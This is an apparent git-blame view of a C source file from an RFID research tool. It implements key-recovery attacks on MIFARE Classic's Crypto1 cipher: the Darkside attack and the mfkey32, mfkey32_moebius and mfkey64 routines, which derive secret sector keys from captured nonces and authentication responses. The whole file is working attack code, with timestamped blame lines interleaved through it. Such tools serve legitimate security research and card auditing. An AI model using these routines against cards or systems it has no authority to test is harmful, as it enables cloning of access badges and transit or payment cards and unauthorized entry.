2017-07-28 02:48:49 +08:00
|
|
|
//-----------------------------------------------------------------------------
|
|
|
|
// Merlok - June 2011
|
|
|
|
// Roel - Dec 2009
|
|
|
|
// Unknown author
|
|
|
|
//
|
|
|
|
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
|
|
|
|
// at your option, any later version. See the LICENSE.txt file for the text of
|
|
|
|
// the license.
|
|
|
|
//-----------------------------------------------------------------------------
|
|
|
|
// MIFARE Darkside hack
|
|
|
|
//-----------------------------------------------------------------------------
|
|
|
|
#include "mfkey.h"
|
2017-12-07 00:15:24 +08:00
|
|
|
|
|
|
|
// MIFARE
|
|
|
|
int compare_uint64(const void *a, const void *b) {
|
|
|
|
if (*(uint64_t*)b == *(uint64_t*)a) return 0;
|
|
|
|
if (*(uint64_t*)b < *(uint64_t*)a) return 1;
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
|
|
|
|
// create the intersection (common members) of two sorted lists. Lists are terminated by -1. Result will be in list1. Number of elements is returned.
|
|
|
|
uint32_t intersection(uint64_t *listA, uint64_t *listB) {
|
|
|
|
if (listA == NULL || listB == NULL)
|
|
|
|
return 0;
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-12-07 00:15:24 +08:00
|
|
|
uint64_t *p1, *p2, *p3;
|
|
|
|
p1 = p3 = listA;
|
|
|
|
p2 = listB;
|
|
|
|
|
|
|
|
while ( *p1 != -1 && *p2 != -1 ) {
|
|
|
|
if (compare_uint64(p1, p2) == 0) {
|
|
|
|
*p3++ = *p1++;
|
|
|
|
p2++;
|
|
|
|
}
|
|
|
|
else {
|
2017-12-07 02:53:41 +08:00
|
|
|
while (compare_uint64(p1, p2) < 0) ++p1;
|
|
|
|
while (compare_uint64(p1, p2) > 0) ++p2;
|
2017-12-07 00:15:24 +08:00
|
|
|
}
|
|
|
|
}
|
|
|
|
*p3 = -1;
|
|
|
|
return p3 - listA;
|
|
|
|
}
|
|
|
|
|
|
|
|
// Darkside attack (hf mf mifare)
|
|
|
|
// if successful it will return a list of keys, not just one.
|
2018-02-09 02:11:35 +08:00
|
|
|
uint32_t nonce2key(uint32_t uid, uint32_t nt, uint32_t nr, uint32_t ar, uint64_t par_info, uint64_t ks_info, uint64_t **keys) {
|
2017-12-07 00:15:24 +08:00
|
|
|
struct Crypto1State *states;
|
2018-02-09 02:11:35 +08:00
|
|
|
uint32_t i, pos;
|
2017-12-07 00:15:24 +08:00
|
|
|
uint8_t bt, ks3x[8], par[8][8];
|
|
|
|
uint64_t key_recovered;
|
2018-02-09 02:11:35 +08:00
|
|
|
uint64_t *keylist;
|
2017-12-07 00:15:24 +08:00
|
|
|
|
|
|
|
// Reset the last three significant bits of the reader nonce
|
|
|
|
nr &= 0xFFFFFF1F;
|
|
|
|
|
|
|
|
for ( pos = 0; pos < 8; pos++ ) {
|
|
|
|
ks3x[7-pos] = (ks_info >> (pos*8)) & 0x0F;
|
|
|
|
bt = (par_info >> (pos*8)) & 0xFF;
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-12-07 00:15:24 +08:00
|
|
|
par[7-pos][0] = (bt >> 0) & 1;
|
|
|
|
par[7-pos][1] = (bt >> 1) & 1;
|
|
|
|
par[7-pos][2] = (bt >> 2) & 1;
|
|
|
|
par[7-pos][3] = (bt >> 3) & 1;
|
|
|
|
par[7-pos][4] = (bt >> 4) & 1;
|
|
|
|
par[7-pos][5] = (bt >> 5) & 1;
|
|
|
|
par[7-pos][6] = (bt >> 6) & 1;
|
|
|
|
par[7-pos][7] = (bt >> 7) & 1;
|
|
|
|
}
|
|
|
|
|
2018-02-09 02:11:35 +08:00
|
|
|
states = lfsr_common_prefix(nr, ar, ks3x, par, (par_info == 0));
|
2017-12-07 00:15:24 +08:00
|
|
|
|
|
|
|
if (!states) {
|
|
|
|
*keys = NULL;
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
keylist = (uint64_t*)states;
|
|
|
|
|
|
|
|
for (i = 0; keylist[i]; i++) {
|
2017-12-07 02:53:41 +08:00
|
|
|
lfsr_rollback_word(states+i, uid ^ nt, 0);
|
2017-12-07 00:15:24 +08:00
|
|
|
crypto1_get_lfsr(states+i, &key_recovered);
|
|
|
|
keylist[i] = key_recovered;
|
|
|
|
}
|
|
|
|
keylist[i] = -1;
|
|
|
|
|
|
|
|
*keys = keylist;
|
|
|
|
return i;
|
|
|
|
}
|
2017-07-28 02:48:49 +08:00
|
|
|
|
|
|
|
// recover key from 2 different reader responses on same tag challenge
|
|
|
|
bool mfkey32(nonces_t data, uint64_t *outputkey) {
|
|
|
|
struct Crypto1State *s,*t;
|
|
|
|
uint64_t outkey = 0;
|
|
|
|
uint64_t key = 0; // recovered key
|
|
|
|
bool isSuccess = false;
|
|
|
|
uint8_t counter = 0;
|
|
|
|
|
2017-12-07 00:15:24 +08:00
|
|
|
uint32_t p640 = prng_successor(data.nonce, 64);
|
|
|
|
uint32_t p641 = prng_successor(data.nonce2, 64);
|
|
|
|
s = lfsr_recovery32(data.ar ^ p640, 0);
|
2017-07-28 02:48:49 +08:00
|
|
|
|
|
|
|
for(t = s; t->odd | t->even; ++t) {
|
|
|
|
lfsr_rollback_word(t, 0, 0);
|
|
|
|
lfsr_rollback_word(t, data.nr, 1);
|
|
|
|
lfsr_rollback_word(t, data.cuid ^ data.nonce, 0);
|
|
|
|
crypto1_get_lfsr(t, &key);
|
|
|
|
crypto1_word(t, data.cuid ^ data.nonce, 0);
|
|
|
|
crypto1_word(t, data.nr2, 1);
|
2017-12-07 00:15:24 +08:00
|
|
|
if (data.ar2 == (crypto1_word(t, 0, 0) ^ p641)) {
|
2017-07-28 02:48:49 +08:00
|
|
|
outkey = key;
|
|
|
|
counter++;
|
|
|
|
if (counter == 20) break;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
isSuccess = (counter == 1);
|
|
|
|
*outputkey = ( isSuccess ) ? outkey : 0;
|
|
|
|
crypto1_destroy(s);
|
|
|
|
return isSuccess;
|
|
|
|
}
|
|
|
|
|
|
|
|
// recover key from 2 reader responses on 2 different tag challenges
|
2017-12-07 00:15:24 +08:00
|
|
|
// skip "several found keys". Only return true if ONE key is found
|
2017-07-28 02:48:49 +08:00
|
|
|
bool mfkey32_moebius(nonces_t data, uint64_t *outputkey) {
|
|
|
|
struct Crypto1State *s, *t;
|
|
|
|
uint64_t outkey = 0;
|
|
|
|
uint64_t key = 0; // recovered key
|
|
|
|
bool isSuccess = false;
|
|
|
|
int counter = 0;
|
2017-12-07 00:15:24 +08:00
|
|
|
uint32_t p640 = prng_successor(data.nonce, 64);
|
|
|
|
uint32_t p641 = prng_successor(data.nonce2, 64);
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-12-07 00:15:24 +08:00
|
|
|
s = lfsr_recovery32(data.ar ^ p640, 0);
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-07-28 02:48:49 +08:00
|
|
|
for(t = s; t->odd | t->even; ++t) {
|
|
|
|
lfsr_rollback_word(t, 0, 0);
|
|
|
|
lfsr_rollback_word(t, data.nr, 1);
|
|
|
|
lfsr_rollback_word(t, data.cuid ^ data.nonce, 0);
|
|
|
|
crypto1_get_lfsr(t, &key);
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-07-28 02:48:49 +08:00
|
|
|
crypto1_word(t, data.cuid ^ data.nonce2, 0);
|
|
|
|
crypto1_word(t, data.nr2, 1);
|
2017-12-07 00:15:24 +08:00
|
|
|
if (data.ar2 == (crypto1_word(t, 0, 0) ^ p641)) {
|
|
|
|
outkey = key;
|
2017-07-28 02:48:49 +08:00
|
|
|
++counter;
|
2017-12-07 00:15:24 +08:00
|
|
|
if (counter == 20) break;
|
2017-07-28 02:48:49 +08:00
|
|
|
}
|
|
|
|
}
|
|
|
|
isSuccess = (counter == 1);
|
|
|
|
*outputkey = ( isSuccess ) ? outkey : 0;
|
|
|
|
crypto1_destroy(s);
|
|
|
|
return isSuccess;
|
|
|
|
}
|
|
|
|
|
|
|
|
// recover key from reader response and tag response of one authentication sequence
|
|
|
|
int mfkey64(nonces_t data, uint64_t *outputkey){
|
2018-02-15 18:47:34 +08:00
|
|
|
uint64_t key = 0; // recovered key
|
|
|
|
uint32_t ks2; // keystream used to encrypt reader response
|
|
|
|
uint32_t ks3; // keystream used to encrypt tag response
|
2017-07-28 02:48:49 +08:00
|
|
|
struct Crypto1State *revstate;
|
2019-03-09 15:59:13 +08:00
|
|
|
|
2017-07-28 02:48:49 +08:00
|
|
|
// Extract the keystream from the messages
|
|
|
|
ks2 = data.ar ^ prng_successor(data.nonce, 64);
|
|
|
|
ks3 = data.at ^ prng_successor(data.nonce, 96);
|
|
|
|
revstate = lfsr_recovery64(ks2, ks3);
|
|
|
|
lfsr_rollback_word(revstate, 0, 0);
|
|
|
|
lfsr_rollback_word(revstate, 0, 0);
|
|
|
|
lfsr_rollback_word(revstate, data.nr, 1);
|
|
|
|
lfsr_rollback_word(revstate, data.cuid ^ data.nonce, 0);
|
|
|
|
crypto1_get_lfsr(revstate, &key);
|
|
|
|
crypto1_destroy(revstate);
|
2019-03-09 15:59:13 +08:00
|
|
|
*outputkey = key;
|
2017-07-28 02:48:49 +08:00
|
|
|
return 0;
|
|
|
|
}
|